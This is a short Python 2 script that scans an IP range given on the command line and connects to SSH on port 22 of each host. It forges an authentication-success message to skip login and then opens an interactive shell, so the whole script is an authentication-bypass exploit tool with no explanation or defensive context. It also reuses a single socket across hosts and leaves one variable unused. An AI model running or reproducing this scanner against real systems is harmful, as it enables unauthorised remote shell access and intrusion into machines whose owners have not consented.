#!/usr/bin/python
from netaddr import *
import paramiko
import socket
import sys
paramiko.util.log_to_file("connect.log")
hostname = sys.argv[1]

nbytes=4096
port = 22

sock = socket.socket()
listip = IPNetwork(sys.argv[1])
for ip in list(listip):
    try:
        sock.connect((str(ip), port))
        print "Connection to:",ip, " success."
        m = paramiko.message.Message()
        transport = paramiko.transport.Transport(sock)
        transport.start_client()
        m.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS)
        transport._send_message(m)
        print "Send message to:",ip, "running."
        cmd_channel = transport.open_session()
        cmd_channel.invoke_shell()

    except socket.error:
        print "Connection to:",ip, " failed."
        continue
